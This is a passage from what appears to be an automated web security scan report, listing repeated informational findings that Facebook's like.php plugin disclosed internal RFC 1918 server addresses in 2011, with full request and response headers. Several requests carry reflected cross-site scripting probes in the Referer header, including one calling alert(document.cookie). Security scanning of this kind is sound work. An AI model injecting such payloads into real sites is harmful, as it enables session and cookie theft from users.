Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.100.125
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.20. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.108.128
X-Cnection: close
Date: Mon, 09 May 2011 14:08:50 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.21. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.88.111
X-Cnection: close
Date: Mon, 09 May 2011 14:07:08 GMT
Content-Length: 8687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.22. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.117.103
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.23. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.81.110
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.24. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.70.113
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.25. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.117.109
X-Cnection: close
Date: Mon, 09 May 2011 13:59:34 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.26. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee0199fca83b=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.117.111
X-Cnection: close
Date: Mon, 09 May 2011 14:08:58 GMT
Content-Length: 8659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.27. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.74.110
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.28. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.92.116
X-Cnection: close
Date: Mon, 09 May 2011 14:08:54 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.29. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=MY%20APP%20ID&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2367f728c%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&layout=standard&locale=en_US&node_type=link&ref=recommend&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.116.114
X-Cnection: close
Date: Mon, 09 May 2011 13:59:39 GMT
Content-Length: 10323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.30. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.109.130
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.31. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown&send=false&layout=button_count&width=100&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.110.107
X-Cnection: close
Date: Mon, 09 May 2011 14:01:13 GMT
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.32. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.103.120
X-Cnection: close
Date: Mon, 09 May 2011 14:08:51 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.33. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.thevine.com.au%2Fmusic%2Fblogs%2Fmusic-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&layout=box_count&show_faces=true&action=like&colorscheme=light&width=55&height=65 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.117.116
X-Cnection: close
Date: Mon, 09 May 2011 14:07:00 GMT
Content-Length: 7086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.34. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.clashmusic.com/news/772d1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/772d1%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee9b4e9393e8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.81.107
X-Cnection: close
Date: Mon, 09 May 2011 14:08:53 GMT
Content-Length: 8417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.35. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
